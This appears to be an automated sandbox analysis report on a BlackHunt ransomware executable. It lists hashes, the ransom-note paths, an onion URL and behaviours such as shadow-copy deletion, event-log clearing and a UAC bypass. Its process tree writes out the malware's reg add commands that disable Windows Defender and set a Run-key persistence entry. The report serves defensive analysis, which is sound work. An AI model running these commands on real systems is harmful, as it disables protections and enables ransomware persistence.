Analysis
  max time kernel: 92s
  max time network: 149s
  platform: windows10-2004_x64
  resource: win10v2004-20231215-en
  resource tags: arch:x64, arch:x86, image:win10v2004-20231215-en, locale:en-us, os:windows10-2004-x64, system
  submitted: 19/01/2024, 01:19

Static task: static1

Behavioral task: behavioral1
  Sample: ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe
  Resource: win7-20231215-en

Behavioral task: behavioral2
  Sample: ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe
  Resource: win10v2004-20231215-en
General
  Target: ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe
  Size: 707KB
  MD5: 352a8dfb2827d4acb843a31d0d5cb6e9
  SHA1: 2b0c654ca2329c2c9b04fb39c7cd1f3a534956b1
  SHA256: ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0
  SHA512: cc6a00c5114aec92ddd22aa2776b646919e9d7056d3dd2edbb81be819733b3c24505d94d7916abb70af7215acdb6b4394c485af1b55bf3cbe0893a78bcae2efb
  SSDEEP: 6144:wcmwdMZ0aq9arLKkdMqJ+VYg/5ICAAQs+d5zSTamgEoOFzxLza1V8Rvnh:6uaTmkZJ+naie5OTamgEoKxLWgFh
Malware Config
  Extracted
    Path: C:\#BlackHunt_ReadMe.hta
    http-equiv="x-ua-compatible"
  Extracted
    Path: C:\ProgramData\#BlackHunt_ReadMe.hta
    http://sdjf982lkjsdvcjlksaf2kjhlksvvnktyoiasuc92lf.onion
Signatures

Deletes NTFS Change Journal [TTPs: 2, IoCs: 2]
The USN change journal is a persistent log of all changes made to local files used by Windows Server systems.
  pid   | Process
  14036 | fsutil.exe
  9572  | fsutil.exe

  description     | ioc | Process
  Key created     | \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection | reg.exe
  Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" | reg.exe

  description     | ioc | Process
  Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe

Clears Windows event logs [TTPs: 1, IoCs: 5]
  pid   | Process
  13296 | wevtutil.exe
  14144 | wevtutil.exe
  14812 | wevtutil.exe
  9176  | wevtutil.exe
  10616 | wevtutil.exe

Deletes shadow copies [TTPs: 2]
Ransomware often targets backup files to inhibit system recovery.

Modifies boot configuration data using bcdedit [TTPs: 1, IoCs: 4]
  pid   | Process
  2288  | bcdedit.exe
  8236  | bcdedit.exe
  13972 | bcdedit.exe
  14172 | bcdedit.exe

Renames multiple (3388) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.

  pid   | Process
  9564  | wbadmin.exe
  11672 | wbadmin.exe

Disables Task Manager via registry modification

Disables use of System Restore points [TTPs: 1]

Checks computer location settings [TTPs: 2, IoCs: 2]
Looks up country code configured in the registry, likely geofence.
  description       | ioc | Process
  Key value queried | \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\Control Panel\International\Geo\Nation | ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe
  Key value queried | \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\Control Panel\International\Geo\Nation | cmd.exe

Adds Run key to start application [TTPs: 2, IoCs: 1]
  description     | ioc | Process
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{2C5F9FCC-F266-43F6-BFD7-838DAE269E11} = "C:\\ProgramData\\#BlackHunt_ReadMe.hta" | reg.exe

  description     | ioc | Process
  Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe
Enumerates connected drives [TTPs: 3, IoCs: 27]
Attempts to read the root path of hard drives other than the default C: drive.
  description             | ioc    | Process
  File opened (read-only) | \??\A: | ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe
  File opened (read-only) | \??\V: | ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe
  File opened (read-only) | \??\N: | ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe
  File opened (read-only) | \??\Q: | ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe
  File opened (read-only) | \??\T: | ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe
  File opened (read-only) | \??\H: | ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe
  File opened (read-only) | \??\W: | ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe
  File opened (read-only) | \??\O: | ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe
  File opened (read-only) | \??\E: | ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe
  File opened (read-only) | \??\J: | ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe
  File opened (read-only) | \??\I: | ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe
  File opened (read-only) | \??\B: | ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe
  File opened (read-only) | \??\M: | ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe
  File opened (read-only) | \??\F: | vssadmin.exe
  File opened (read-only) | \??\F: | fsutil.exe
  File opened (read-only) | \??\K: | ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe
  File opened (read-only) | \??\X: | ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe
  File opened (read-only) | \??\R: | ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe
  File opened (read-only) | \??\L: | ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe
  File opened (read-only) | \??\Z: | ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe
  File opened (read-only) | \??\F: | vssadmin.exe
  File opened (read-only) | \??\M: | fsutil.exe
  File opened (read-only) | \??\U: | ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe
  File opened (read-only) | \??\P: | ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe
  File opened (read-only) | \??\G: | ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe
  File opened (read-only) | \??\Y: | ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe
  File opened (read-only) | \??\S: | ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe

Looks up external IP address via web service [IoCs: 1]
Uses a legitimate IP lookup service to find the infected system's external IP.
  flow | ioc
  3    | ip-api.com

Sets desktop wallpaper using registry [TTPs: 2, IoCs: 1]
  description     | ioc | Process
  Set value (str) | \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\#BlackHunt_BG.jpg" | ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe
Drops file in Program Files directory [IoCs: 64]
All 64 entries below were performed by the same process, ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe.
  description | ioc
  File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\pl-pl\ui-strings.js
  File created | C:\Program Files\VideoLAN\VLC\locale\ga\#BlackHunt_ReadMe.txt
  File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\fi-fi\ui-strings.js
  File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\nb-no\#BlackHunt_Private.key
  File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\SaslPrep\#BlackHunt_Private.key
  File created | C:\Program Files\VideoLAN\VLC\locale\an\#BlackHunt_ReadMe.hta
  File created | C:\Program Files\VideoLAN\VLC\locale\fy\#BlackHunt_ReadMe.txt
  File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\nls\fi-fi\#BlackHunt_ReadMe.hta
  File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\ar-ae\#BlackHunt_ReadMe.txt
  File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\tr-tr\ui-strings.js
  File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\sl-sl\ui-strings.js
  File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\s_filetype_xd.svg
  File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\images\themes\dark\digsig_icons.png
  File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\ru-ru\ui-strings.js
  File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\en-ae\#BlackHunt_ReadMe.hta
  File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\he-il\#BlackHunt_ReadMe.hta
  File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\fr-fr\#BlackHunt_ReadMe.txt
  File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\en-ae\ui-strings.js
  File opened for modification | C:\Program Files\7-Zip\Lang\fa.txt
  File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_invite_24.svg
  File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\#BlackHunt_ReadMe.txt
  File opened for modification | C:\Program Files\7-Zip\Lang\lij.txt
  File created | C:\Program Files\VideoLAN\VLC\plugins\d3d11\#BlackHunt_Private.key
  File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\ui-strings.js
  File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\pl-pl\#BlackHunt_ReadMe.hta
  File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\ro-ro\#BlackHunt_ReadMe.hta
  File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\css\#BlackHunt_Private.key
  File opened for modification | C:\Program Files\Java\jre-1.8\lib\deploy\messages_es.properties
  File opened for modification | C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_glass_100_f6f6f6_1x400.png
  File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_anonymoususer_18.svg
  File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\nl-nl\#BlackHunt_ReadMe.hta
  File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\he-il\#BlackHunt_ReadMe.hta
  File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\images\themes\dark\Info2x.png
  File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\#BlackHunt_ReadMe.hta
  File created | C:\Program Files\VideoLAN\VLC\plugins\lua\#BlackHunt_ReadMe.hta
  File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\#BlackHunt_ReadMe.hta
  File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_folder-down_32.svg
  File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Appstore\Download_on_the_App_Store_Badge_nb_135x40.svg
  File opened for modification | C:\Program Files\Java\jdk-1.8\legal\javafx\libxml2.md
  File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\ru-ru\ui-strings.js
  File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\hr-hr\#BlackHunt_Private.key
  File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\ca-es\#BlackHunt_ReadMe.hta
  File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\images\#BlackHunt_ReadMe.txt
  File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\fi-fi\#BlackHunt_ReadMe.txt
  File created | C:\Program Files\VideoLAN\VLC\locale\gu\#BlackHunt_Private.key
  File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\apple-touch-icon-144x144-precomposed.png
  File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\ca-es\#BlackHunt_ReadMe.hta
  File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\hr-hr\#BlackHunt_ReadMe.txt
  File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\css\#BlackHunt_ReadMe.txt
  File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\root\#BlackHunt_Private.key
  File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Playstore\tr_get.svg
  File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\ja-jp\#BlackHunt_Private.key
  File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\css\app\dev\libs\#BlackHunt_ReadMe.txt
  File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\cs-cz\ui-strings.js
  File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\sv-se\#BlackHunt_ReadMe.hta
  File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\css\main-selector.css
  File created | C:\Program Files\VideoLAN\VLC\lua\meta\reader\#BlackHunt_ReadMe.hta
  File created | C:\Program Files\VideoLAN\VLC\plugins\spu\#BlackHunt_Private.key
  File opened for modification | C:\Program Files\VideoLAN\VLC\uninstall.log
  File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\sendforcomments.svg
  File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\en-il\ui-strings.js
  File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\inline-error-1x.png
  File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\HomeBanner_Dark.pdf
  File opened for modification | C:\Program Files\Java\jdk-1.8\jre\lib\calendars.properties
Enumerates physical storage devices [TTPs: 1]
Attempts to interact with connected storage/optical drive(s).

Checks SCSI registry key(s) [TTPs: 3, IoCs: 4]
SCSI information is often read in order to detect sandboxing environments.
  description       | ioc | Process
  Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName | vds.exe
  Key opened        | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_DADY&PROD_DADY_DVD-ROM\4&215468A5&0&010000 | vds.exe
  Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\FriendlyName | vds.exe
  Key opened        | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 | vds.exe

Creates scheduled task(s) [TTPs: 1, IoCs: 1]
Schtasks is often used by malware for persistence or to perform post-infection execution.
  pid  | Process
  3144 | schtasks.exe

Interacts with shadow copies [TTPs: 2, IoCs: 6]
Shadow copies are often targeted by ransomware to inhibit system recovery.
  pid   | Process
  2840  | vssadmin.exe
  3960  | vssadmin.exe
  2924  | vssadmin.exe
  348   | vssadmin.exe
  4548  | vssadmin.exe
  14700 | vssadmin.exe

Kills process with taskkill [IoCs: 1]
  pid   | Process
  14628 | taskkill.exe

Modifies registry class [IoCs: 9]
  description     | ioc | Process
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\ | reg.exe
  Key created     | \REGISTRY\MACHINE\Software\Classes\Hunt2\DefaultIcon | reg.exe
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" | reg.exe
  Key created     | \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000_Classes\Local Settings | cmd.exe
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\ | reg.exe
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" | cmd.exe
  Key created     | \REGISTRY\MACHINE\Software\Classes\Hunt2 | reg.exe
  Key created     | \REGISTRY\MACHINE\Software\Classes\.Hunt2 | reg.exe
  Key created     | \REGISTRY\MACHINE\Software\Classes\.Hunt2\DefaultIcon | cmd.exe

Runs ping.exe [TTPs: 1, IoCs: 1]
  pid  | Process
  7572 | PING.EXE

Suspicious behavior: GetForegroundWindowSpam [IoCs: 1]
  pid  | Process
  4480 | ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe

Suspicious use of AdjustPrivilegeToken [IoCs: 24]
  description                       | pid   | Process
  Token: SeDebugPrivilege           | 4480  | ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe
  Token: SeRestorePrivilege         | 4480  | ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe
  Token: SeBackupPrivilege          | 4480  | ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe
  Token: SeTakeOwnershipPrivilege   | 4480  | ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe
  Token: SeAuditPrivilege           | 4480  | ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe
  Token: SeSecurityPrivilege        | 4480  | ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe
  Token: SeIncBasePriorityPrivilege | 4480  | ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe
  Token: SeBackupPrivilege          | 2436  | vssvc.exe
  Token: SeRestorePrivilege         | 2436  | vssvc.exe
  Token: SeAuditPrivilege           | 2436  | vssvc.exe
  Token: SeBackupPrivilege          | 7536  | wbengine.exe
  Token: SeRestorePrivilege         | 7536  | wbengine.exe
  Token: SeSecurityPrivilege        | 7536  | wbengine.exe
  Token: SeSecurityPrivilege        | 13296 | wevtutil.exe
  Token: SeBackupPrivilege          | 13296 | wevtutil.exe
  Token: SeSecurityPrivilege        | 14144 | wevtutil.exe
  Token: SeBackupPrivilege          | 14144 | wevtutil.exe
  Token: SeSecurityPrivilege        | 14812 | wevtutil.exe
  Token: SeBackupPrivilege          | 14812 | wevtutil.exe
  Token: SeSecurityPrivilege        | 9176  | wevtutil.exe
  Token: SeBackupPrivilege          | 9176  | wevtutil.exe
  Token: SeSecurityPrivilege        | 10616 | wevtutil.exe
  Token: SeBackupPrivilege          | 10616 | wevtutil.exe
  Token: SeDebugPrivilege           | 14628 | taskkill.exe
Suspicious use of WriteProcessMemory [IoCs: 64]
Each of the 32 distinct writes below is recorded twice in the report, giving the 64 IoCs.
  description                        | pid  | Process | procid_target
  PID 4480 wrote to memory of 4504   | 4480 | ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe | 89
  PID 4480 wrote to memory of 3876   | 4480 | ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe | 91
  PID 4480 wrote to memory of 4920   | 4480 | ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe | 93
  PID 4480 wrote to memory of 548    | 4480 | ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe | 95
  PID 4504 wrote to memory of 3340   | 4504 | cmd.exe | 97
  PID 4480 wrote to memory of 4452   | 4480 | ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe | 98
  PID 3876 wrote to memory of 4844   | 3876 | cmd.exe | 173
  PID 4480 wrote to memory of 4596   | 4480 | ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe | 102
  PID 4920 wrote to memory of 3732   | 4920 | cmd.exe | 103
  PID 4480 wrote to memory of 3280   | 4480 | ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe | 104
  PID 4480 wrote to memory of 1560   | 4480 | ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe | 187
  PID 4480 wrote to memory of 4424   | 4480 | ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe | 109
  PID 548 wrote to memory of 1880    | 548  | cmd.exe | 108
  PID 4480 wrote to memory of 2172   | 4480 | ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe | 201
  PID 4480 wrote to memory of 4900   | 4480 | ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe | 112
  PID 4480 wrote to memory of 4312   | 4480 | ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe | 114
  PID 4480 wrote to memory of 1984   | 4480 | ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe | 117
  PID 4480 wrote to memory of 1980   | 4480 | ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe | 119
  PID 4480 wrote to memory of 3736   | 4480 | ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe | 123
  PID 4596 wrote to memory of 396    | 4596 | cmd.exe | 124
  PID 3280 wrote to memory of 1644   | 3280 | cmd.exe | 122
  PID 4452 wrote to memory of 1724   | 4452 | cmd.exe | 125
  PID 1560 wrote to memory of 3708   | 1560 | Conhost.exe | 127
  PID 4424 wrote to memory of 836    | 4424 | cmd.exe | 126
  PID 4480 wrote to memory of 4176   | 4480 | ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe | 128
  PID 4312 wrote to memory of 4376   | 4312 | cmd.exe | 129
  PID 4480 wrote to memory of 3744   | 4480 | ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe | 131
  PID 4900 wrote to memory of 5116   | 4900 | cmd.exe | 133
  PID 1984 wrote to memory of 1256   | 1984 | cmd.exe | 135
  PID 2172 wrote to memory of 4792   | 2172 | cmd.exe | 134
  PID 4480 wrote to memory of 760    | 4480 | ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe | 137
  PID 3736 wrote to memory of 1616   | 3736 | cmd.exe | 136
System policy modification [TTPs: 1, IoCs: 3]
  description     | ioc | Process
  Key created     | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System | ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe
  Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe
  Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" | ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe

Uses Task Scheduler COM API [TTPs: 1]
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe"C:\Users\Admin\AppData\Local\Temp\ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe"1⤵
- UAC bypass
- Checks computer location settings
- Checks whether UAC is enabled
- Enumerates connected drives
- Sets desktop wallpaper using registry
- Drops file in Program Files directory
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:4480

  C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f
  - Suspicious use of WriteProcessMemory
  PID:4504
    C:\Windows\system32\reg.exe
    reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f
    - Modifies registry class
    PID:3340

  C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f
  - Suspicious use of WriteProcessMemory
  PID:3876
    C:\Windows\system32\reg.exe
    reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f
    PID:4844

  C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f
  - Suspicious use of WriteProcessMemory
  PID:4920
    C:\Windows\system32\reg.exe
    reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f
    - Modifies registry class
    PID:3732

  C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f
  - Suspicious use of WriteProcessMemory
  PID:548
    C:\Windows\system32\reg.exe
    reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f
    - Modifies registry class
    PID:1880

  C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f
  - Suspicious use of WriteProcessMemory
  PID:4452
    C:\Windows\system32\reg.exe
    reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f
    - Adds Run key to start application
    PID:1724

  C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f
  - Suspicious use of WriteProcessMemory
  PID:4596
    C:\Windows\system32\reg.exe
    reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f
    PID:396

  C:\Windows\System32\cmd.exe
